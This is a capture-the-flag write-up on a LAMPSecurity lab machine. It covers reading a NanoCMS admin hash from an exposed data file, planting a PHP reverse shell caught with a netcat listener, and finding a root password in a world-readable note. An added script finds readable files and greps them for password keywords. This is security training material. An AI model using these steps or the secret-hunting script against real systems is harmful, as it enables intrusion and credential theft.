The blog also has an admin login page, and there is a SquirrelMail webmail page as well:
The contact form allows you to send a message to the staff, and there is another app that acts as an event manager:
Also, on port 901 there is Samba's SWAT (Samba Web Administration Tool), protected by HTTP basic authentication. It provides a web-based interface for configuring Samba.
Exploiting the CMS
I made an account on the event manager, but that didn't seem to help me much besides creating new blog posts. Next I tested the contact form for SQL injection, but no luck there either. And despite the path traversal error, I wasn't able to read arbitrary files on the system.
It turns out I had actually overlooked an important piece of information. On Andy Carp's blog, we can see that the site is powered by NanoCMS. I had noticed it but didn't give it any thought. When I finally clicked on it to learn more, it took me to a domain-for-sale page, so I figured it might be some simulated CMS created just for this challenge. Good that I thought to google it and see how wrong I was :p NanoCMS is a lightweight PHP-based CMS that is now discontinued. However, I found a super useful NanoCMS security review that made compromising the target possible ;)
Among the vulnerabilities present in the CMS, there is one that allows unrestricted access to the /data/pagesdata.txt file. This file contains the username and password hash of the administrator:
I cracked the hash with my favorite online cracker and found out the password is shannon. Next, I logged in to the admin panel:
Now we have the ability to add new pages containing our own PHP code. I used pentestmonkey's PHP reverse shell, changed the IP and port, and set up a netcat listener to catch the reverse connection. Then I clicked on the newly created page on the blog and looked to my netcat for the goodies:
nc -vvnlp 5555
listening on [any] 5555 ...
connect to [192.168.80.155] from (UNKNOWN) [192.168.80.154] 43028
Linux localhost.localdomain 2.6.23.1-42.fc8 #1 SMP Tue Oct 30 13:55:12 EDT 2007 i686 i686 i386 GNU/Linux
11:02:41 up 3:30, 0 users, load average: 0.24, 0.05, 0.02
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0
sh: no job control in this shell
sh-3.2$ whoami
apache
Time for some enumeration! Looking in the home directory, I noticed quite a few user folders:
sh-3.2$ ls
amy
andy
jennifer
loren
patrick
I looked inside each of them with ls -al. The contents were very similar, and I could find nothing interesting in the files I was allowed to read, until I got to patrick's directory, which contained more hidden files than the others:
sh-3.2$ ls -al patrick
total 344
drwxrwxr-x 25 patrick patrick 4096 Dec 5 2012 .
drwxr-xr-x 7 root root 4096 Apr 28 2009 ..
-rw------- 1 patrick patrick 0 Dec 5 2012 .ICEauthority
drwx------ 2 patrick patrick 4096 Apr 28 2009 .Trash
-rw------- 1 patrick patrick 530 Dec 5 2012 .bash_history
-rw-r--r-- 1 patrick patrick 33 Aug 31 2007 .bash_logout
-rw-r--r-- 1 patrick patrick 176 Aug 31 2007 .bash_profile
-rw-r--r-- 1 patrick patrick 124 Aug 31 2007 .bashrc
drwxr-xr-x 2 patrick patrick 4096 Apr 28 2009 .config
-rw-r--r-- 1 patrick patrick 28 Apr 29 2009 .dmrc
drwxrwxr-x 8 patrick patrick 4096 Apr 29 2009 .evolution
drwx------ 5 patrick patrick 4096 Dec 5 2012 .gconf
drwx------ 2 patrick patrick 4096 Dec 5 2012 .gconfd
drwxrwxr-x 3 patrick patrick 4096 Apr 28 2009 .gnome
drwxr-xr-x 7 patrick patrick 4096 Dec 5 2012 .gnome2
drwx------ 2 patrick patrick 4096 Apr 28 2009 .gnome2_private
drwxr-xr-x 2 patrick patrick 4096 Apr 28 2009 .gstreamer-0.10
-rw-rw-r-- 1 patrick patrick 146 Dec 5 2012 .gtk-bookmarks
-rw-r--r-- 1 patrick patrick 89 Apr 28 2009 .gtkrc-1.2-gnome2
drwxr-xr-x 3 patrick patrick 4096 Apr 28 2009 .local
-rw-rw-r-- 1 patrick patrick 18 Apr 29 2009 .mailboxlist
drwx------ 3 patrick patrick 4096 Apr 28 2009 .metacity
drwx------ 3 patrick patrick 4096 Apr 28 2009 .mozilla
-rw------- 1 patrick patrick 37 Apr 29 2009 .mysql_history
drwxr-xr-x 3 patrick patrick 4096 Dec 5 2012 .nautilus
-rw-rw-r-- 1 patrick patrick 773 Dec 5 2012 .recently-used.xbel
drwxrwxr-x 4 patrick patrick 4096 Dec 5 2012 .tomboy
-rw-r--r-- 1 patrick patrick 5128 Dec 5 2012 .tomboy.log
drwxr-xr-x 2 patrick patrick 4096 Dec 5 2012 .wapi
-rw-r--r-- 1 patrick patrick 847 Dec 5 2012 .xsession-errors
-rw-r--r-- 1 patrick patrick 658 Oct 11 2007 .zshrc
drwxr-xr-x 2 patrick patrick 4096 Apr 28 2009 Desktop
drwxr-xr-x 2 patrick patrick 4096 Apr 28 2009 Documents
drwxr-xr-x 2 patrick patrick 4096 Apr 28 2009 Download
-rw------- 1 patrick patrick 509 Apr 29 2009 Drafts
drwxr-xr-x 2 patrick patrick 4096 Apr 28 2009 Music
drwxr-xr-x 2 patrick patrick 4096 Apr 28 2009 Pictures
drwxr-xr-x 2 patrick patrick 4096 Apr 28 2009 Public
-rw------- 1 patrick patrick 4329 Apr 29 2009 Sent
drwxr-xr-x 2 patrick patrick 4096 Apr 28 2009 Templates
-rw------- 1 patrick patrick 1243 Apr 29 2009 Trash
drwxr-xr-x 2 patrick patrick 4096 Apr 28 2009 Videos
-rwxrw---- 1 patrick patrick 0 Apr 29 2009 test.txt
I couldn't read the .mysql_history (mode 600) or test.txt (mode 760) files, since neither grants read permission to others, but the next one I tried, the world-readable .tomboy.log, was really interesting! I only show the interesting bits here:
sh-3.2$ cat .tomboy.log
...
12/5/2012 7:24:34 AM [DEBUG]: Creating Buffer for 'New Note 3'...
12/5/2012 7:24:34 AM [DEBUG]: New Note 3 tags:
12/5/2012 7:24:38 AM [DEBUG]: Saving 'New Note 3'...
12/5/2012 7:24:46 AM [DEBUG]: Renaming note from New Note 3 to Root password
12/5/2012 7:24:56 AM [DEBUG]: Saving 'Root password'...
12/5/2012 7:25:03 AM [DEBUG]: Saving 'Root password'...
12/5/2012 7:27:41 AM [DEBUG]: Received request for saving session
12/5/2012 7:27:41 AM [DEBUG]: Saving unsaved notes...
12/5/2012 7:27:41 AM [DEBUG]: All done. Ciao!
Tomboy is a note-taking application, and it looks like the root password was saved in a note?! I went to the .tomboy directory (mode 775, so anyone can list and read it) and found some notes:
sh-3.2$ ls
481bca0d-7206-45dd-a459-a72ea1131329.note
addin-db-000
addins
ae9cfc26-64e8-4f6f-a8b4-0296e8173504.note
d2684fad-3aab-444c-b90a-4f307c0818f6.note
manifest.xml
Now all that is left is to become root! I SSH'ed in with the root credentials from the note, and the machine is mine!
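The home-directory sweep above (ls -al in each user's directory, then trying to read whatever the apache account could open) can be scripted. The following is an added example and not part of the original writeup: given a directory standing in for /home, it lists every regular file an unrelated account can read, then greps those files for credential-like keywords. The fixture it builds (user names, file names and contents) is constructed to mimic the listing above; nothing in it comes from the target.

```shell
#!/bin/bash
# Added example, not code from the original writeup: a scripted version of the
# manual home-directory sweep. All paths, user names and file contents in the
# fixture below are constructed.

# Print every regular file under $1 whose "other" read bit is set, skipping
# directories that "other" cannot traverse (no o+x), since their contents are
# unreachable to an unrelated account regardless of the files' own modes.
# This approximates what a user like apache sees; it ignores group membership,
# POSIX ACLs and SELinux labels, so treat hits as candidates, not guarantees.
list_world_readable() {
    find "$1" -type d ! -perm -001 -prune -o -type f -perm -004 -print 2>/dev/null | sort
}

# For each world-readable file under $1, print "path:line:text" for lines that
# mention credential-like keywords (case-insensitive). grep exiting 1 for a
# file with no hits is expected, so it is not treated as an error.
grep_for_secrets() {
    list_world_readable "$1" | while IFS= read -r f; do
        grep -iHnE 'passw(or)?d|credential|secret' "$f" 2>/dev/null || true
    done
}

# Constructed fixture shaped like the target's /home: andy with a harmless
# .bashrc, patrick with a private .bash_history (600), a world-readable
# .tomboy.log (644) and a world-readable Tomboy note (664). Prints its root.
make_fixture() {
    local root
    root=$(mktemp -d)
    chmod 755 "$root"
    mkdir -p "$root/andy" "$root/patrick/.tomboy"
    chmod 755 "$root/andy" "$root/patrick" "$root/patrick/.tomboy"

    printf 'alias ll="ls -al"\n' > "$root/andy/.bashrc"
    chmod 644 "$root/andy/.bashrc"

    printf 'mysql -u root -p\n' > "$root/patrick/.bash_history"
    chmod 600 "$root/patrick/.bash_history"

    printf '%s\n' \
        "12/5/2012 7:24:46 AM [DEBUG]: Renaming note from New Note 3 to Root password" \
        "12/5/2012 7:24:56 AM [DEBUG]: Saving 'Root password'..." \
        > "$root/patrick/.tomboy.log"
    chmod 644 "$root/patrick/.tomboy.log"

    # Placeholder note body; the real note's contents are not reproduced here.
    printf '<note><title>Root password</title><text>constructed placeholder</text></note>\n' \
        > "$root/patrick/.tomboy/constructed.note"
    chmod 664 "$root/patrick/.tomboy/constructed.note"

    printf '%s\n' "$root"
}

# Demo: build the fixture, run both checks, clean up.
demo_root=$(make_fixture)
echo "== world-readable files under $demo_root =="
list_world_readable "$demo_root"
echo "== credential keyword hits =="
grep_for_secrets "$demo_root"
rm -rf "$demo_root"
```

Run it as the low-privilege user you actually hold (here that would be apache), pointing it at the real /home. On the target, the same permission check would have flagged .tomboy.log (mode 644) and anything readable under the 775 .tomboy directory, while skipping .mysql_history (600) and test.txt (760), which is exactly the set of files that mattered above.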
Concluding remarks
This was another cool challenge in the LAMPSecurity series! The exploitation was possible because of the vulnerable CMS, which not only disclosed the administrator's credentials but also allowed an attacker to execute code on the target. Although the foothold was only the unprivileged apache user, files in the home directories were readable by others when they shouldn't have been, and the root password was sitting in an unprotected note for anyone to read. A good example of how a chain of misconfigurations can lead to total compromise of a machine.
/ It's lucky you're going so slowly, \
| because you're going in the wrong  |
\ direction.                         /
 ------------------------------------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||